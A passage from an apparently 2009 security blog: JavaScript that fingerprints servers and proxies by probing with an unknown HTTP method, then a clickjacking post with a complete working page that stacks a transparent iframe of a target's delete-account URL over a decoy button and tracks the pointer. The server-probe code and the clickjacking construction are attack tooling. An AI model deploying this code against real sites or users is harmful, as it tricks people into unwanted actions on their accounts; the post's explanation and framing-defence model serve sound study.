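// proxy by how it answers an unregistered HTTP method.
const PROBE_METHOD = "JAG";
const PROBE_TARGET = "/\\".repeat(6); // the post's request-target, /\/\/\/\/\/\

function buildProbe(method = PROBE_METHOD, target = PROBE_TARGET) {
  // HTTP/1.0, so no Host header is required, exactly as typed into nc.
  return `${method} ${target} HTTP/1.0\r\n\r\n`;
}

// Split a raw response into version, status, reason phrase and headers (names
// lower-cased). The body is dropped: the discriminators live in the head.
function parseResponse(raw) {
  const lines = raw.split("\r\n\r\n")[0].split("\r\n");
  const m = /^(HTTP\/\d\.\d) (\d{3}) ?(.*)$/.exec(lines[0]);
  if (!m) throw new Error(`not an HTTP status line: ${lines[0]}`);
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { version: m[1], status: Number(m[2]), reason: m[3], headers };
}

// Classify by behaviour, not by the Server banner. 501 alone does not separate
// IIS from Apache, so the reason phrase and the Allow list do the work; a 400
// carrying Via or X-Squid-Error marks an intermediary that rejected the
// request before any origin server saw the method.
function fingerprint(resp) {
  const { status, reason, headers } = resp;
  if (status === 400 && ("via" in headers || "x-squid-error" in headers)) {
    return "proxy: rejects unknown method/URI as a malformed request";
  }
  if (status === 501) {
    if (reason === "Method Not Implemented" && "allow" in headers) {
      return "apache-like: 501 'Method Not Implemented' with Allow list";
    }
    if (reason === "Not Implemented") {
      return "iis-like: 501 'Not Implemented', no Allow header";
    }
    return `origin: 501 with unrecognised reason phrase '${reason}'`;
  }
  return `unclassified: ${status} ${reason}`;
}

// True when the Server banner claims one family but the behaviour matches
// another: banners can be trimmed or rewritten, reason phrases rarely are.
function bannerMismatch(resp) {
  const server = (resp.headers.server || "").toLowerCase();
  const fp = fingerprint(resp);
  if (server.startsWith("apache")) return !fp.startsWith("apache-like");
  if (server.startsWith("microsoft-iis")) return !fp.startsWith("iis-like");
  return false;
}

// Live probe, not run by default; use only against hosts you may test.
function probe(host, port = 80, timeoutMs = 5000) {
  const net = require("net");
  return new Promise((resolve, reject) => {
    const chunks = [];
    const sock = net.connect({ host, port }, () => sock.write(buildProbe()));
    sock.setTimeout(timeoutMs, () => sock.destroy(new Error("timeout")));
    sock.on("data", (c) => chunks.push(c));
    sock.on("error", reject);
    sock.on("close", () => {
      try { resolve(parseResponse(Buffer.concat(chunks).toString("latin1"))); }
      catch (e) { reject(e); }
    });
  });
}

// Constructed samples, reassembled from the responses quoted in the post.
const IIS_SAMPLE = [
  "HTTP/1.1 501 Not Implemented",
  "X-UA-Compatible: IE=EmulateIE7",
  "Date: Tue, 24 Feb 2009 14:06:06 GMT",
  "Connection: close", "", "",
].join("\r\n");
const APACHE_SAMPLE = [
  "HTTP/1.1 501 Method Not Implemented",
  "Date: Tue, 24 Feb 2009 14:50:58 GMT",
  "Server: Apache/2.2.9 (Unix)",
  "Allow: GET,HEAD,POST,OPTIONS,TRACE",
  "Connection: close",
  "Content-Type: text/html; charset=iso-8859-1", "", "",
].join("\r\n");
const SQUID_SAMPLE = [
  "HTTP/1.0 400 Bad Request",
  "Server: squid/2.7.STABLE6",
  "X-Squid-Error: ERR_INVALID_REQ 0",
  "Via: 1.0 cache5.zmh.zope.net:8300 (squid/2.7.STABLE6)",
  "Connection: close", "", "",
].join("\r\n");

// Classify the three samples; returns { iis: ..., apache: ..., squid: ... }.
function classifyAll() {
  const out = {};
  for (const [name, raw] of [["iis", IIS_SAMPLE], ["apache", APACHE_SAMPLE], ["squid", SQUID_SAMPLE]]) {
    out[name] = fingerprint(parseResponse(raw));
  }
  return out;
}
```

Against a live host, `probe("host").then(r => console.log(fingerprint(r), bannerMismatch(r)))` gives the behavioural class next to a flag saying whether the banner agrees with it; a 400 from an intermediary means the probe never reached the origin and the method check was done at the perimeter.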

Regards
0kn0ck

Posted on 2/24/2009 05:23:00 AM by 0kn0ck | 0 Comments

More Towards Clickjacking - Simulating Positive Trends



Clickjacking. You will find a number of definitions of this attack. In general terms, it is an attack that not only simulates mouse events while performing malicious operations but also hijacks user interface components displayed by a specific site.

Usually, the aim is to trap the handling of hidden events when the mouse is clicked over a user interface component such as a button. I am considering all the web-based variants that can be triggered through browsers. The point of this discussion of clickjacking is to scrutinize the behavior of user interface elements (buttons). The events can be generated dynamically or manually; when a visible interface element is clicked, a hidden event is executed behind it.

A simple POC based on this concept was released recently. It revolves around activating code inside a hidden div through a generic mouse event bound to that hidden structure. It does not rely on the usual JavaScript call, location.href, alone; that is one part, but what is more interesting is the pure use of a hidden event triggered by a mouse click. The POC is a very simple variant that just shows how the browser handles the request. Far more damaging actions can be performed where the user is already authenticated to the target site.

The mechanics are very much about what the user sees. The major elements are:

1. Execution of hidden frames by tying the mouse interaction to visible components (buttons).
2. Mouse coordinates play a critical role in matching the position of the hidden element to the visible one.

The coordinate function:

function clickjack_armor(evt)
{
    // pageX/pageY include the scroll offset; fall back to clientX/clientY
    // where a browser does not supply them (a value of 0 is still valid)
    clickjack_mouseX = (typeof evt.pageX === 'number') ? evt.pageX : evt.clientX;
    clickjack_mouseY = (typeof evt.pageY === 'number') ? evt.pageY : evt.clientY;
    // park the hidden div one pixel off the pointer; style.left/top need a
    // unit ('px') in standards mode, where a bare number is ignored
    var hidden = document.getElementById('mydiv');
    hidden.style.left = (clickjack_mouseX - 1) + 'px';
    hidden.style.top = (clickjack_mouseY - 1) + 'px';
}

When we talk about hidden, we mean DIV tags or other hand-crafted markup that produce hidden frames.

3. The victim has to be lured onto the page.
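The mechanics above in working code, as an added example that is not the POC the post describes: a transparent iframe of the target stacked over a visible decoy button, and a mousemove handler that keeps the target's real button under the pointer, which is the job the hidden-div coordinate function does. TARGET_URL and TARGET_BUTTON (the button's position inside the framed page) are assumptions for illustration; the page builds itself only when run in a browser, and the handler logic is kept separate so it can be exercised without one. The last function models X-Frame-Options, the response header that stops the target from loading in the frame at all.

```javascript
// Added example, not the POC discussed in the post.
const TARGET_URL = "https://target.example/account/delete";          // assumed
const TARGET_BUTTON = { left: 320, top: 140, width: 90, height: 28 }; // assumed px, inside the framed page

// pageX/pageY where available, otherwise clientX/clientY: the same fallback
// the quoted coordinate function uses.
function pointerFromEvent(evt) {
  return {
    x: typeof evt.pageX === "number" ? evt.pageX : evt.clientX,
    y: typeof evt.pageY === "number" ? evt.pageY : evt.clientY,
  };
}

// Frame offset that puts the centre of `button` (coordinates inside the framed
// page) exactly under the pointer. Returned with px units: in standards mode a
// bare number assigned to style.left is ignored, which is a common reason a
// POC like this silently stops tracking.
function overlayOffset(pointer, button) {
  return {
    left: `${Math.round(pointer.x - (button.left + button.width / 2))}px`,
    top: `${Math.round(pointer.y - (button.top + button.height / 2))}px`,
  };
}

// Wire the tracking handler. `doc` and `frame` are passed in so the logic can
// run without a browser; the handler is returned so it can be driven directly.
function armFrame(doc, frame, button) {
  const onMove = (evt) => {
    const off = overlayOffset(pointerFromEvent(evt), button);
    frame.style.left = off.left;
    frame.style.top = off.top;
  };
  doc.addEventListener("mousemove", onMove);
  return onMove;
}

// The defence the attack depends on being absent. Returns true when a page
// carrying `value` as its X-Frame-Options header may be framed, where
// `sameOrigin` says whether the framing page shares the target's origin.
// (ALLOW-FROM is not modelled here.)
function xfoAllowsFraming(value, sameOrigin) {
  const v = (value || "").trim().toUpperCase();
  if (v === "DENY") return false;
  if (v === "SAMEORIGIN") return sameOrigin;
  return true; // header missing or unrecognised: the browser frames it
}

// Browser only: build the decoy plus transparent frame and start tracking.
if (typeof document !== "undefined") {
  const decoy = document.createElement("button");
  decoy.textContent = "Click to continue";
  decoy.style.cssText = "position:absolute;left:100px;top:100px";
  const frame = document.createElement("iframe");
  frame.src = TARGET_URL;
  // opacity:0 keeps the frame invisible but fully clickable, above the decoy
  frame.style.cssText =
    "position:absolute;width:800px;height:600px;border:0;opacity:0;z-index:2";
  document.body.append(decoy, frame);
  armFrame(document, frame, TARGET_BUTTON);
}
```

Drop the block into a script tag on a test page and move the mouse: the decoy never receives the click, the framed page does. If the target answers with X-Frame-Options: DENY the frame stays empty and the whole construction falls apart, which is why xfoAllowsFraming() returns false for it.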

If we consider this definition of clickjacking:
"A clickjacked page tricks a user into performing undesired actions by clicking on a concealed link. On a clickjacked page, the attackers show a set of dummy buttons, then load another page over it in a transparent layer. The user thinks he is clicking the visible buttons, while he/she is actually performing actions on the hidden page"

Clickjacking is based on a similar principle to social engineering: convince the end user to perform an action that seems to have no value to them but, in the particular context of the hidden page, has power over the user's assets or identity.

Again, I think the real issue behind clickjacking has been clearly on the cards. I sincerely feel that SecTheory has given a clear explanation here: ClickJacking Paper.

The rest is a browser issue, and the events can be triggered in a number of ways. Browser interaction with users is always on the verge of exploitation. So this is a threat, and we have to collaborate in working against it.

Security is a prime motive, so let's be driven by it.

Cheers

Posted on 2/01/2009 04:32:00 AM by 0kn0ck | 0 Comments

BCS Article - Scrutinizing Business Logic

The British Computer Society has published a new article on business logic written by secniche. The article revolves around:

The vulnerability pattern is shifting towards the application level, and attackers are concentrating on exploiting web applications rather than system-level weaknesses. High-end attacks used to start with XSS and SQL injection, but the paradigm has shifted towards business logic flaws.

For detailed article:

http://www.bcs.org/server.php?show=ConWebDoc.24009&changeNav=8265

Regards
0kn0ck

Posted on 1/22/2009 01:13:00 AM by 0kn0ck | 0 Comments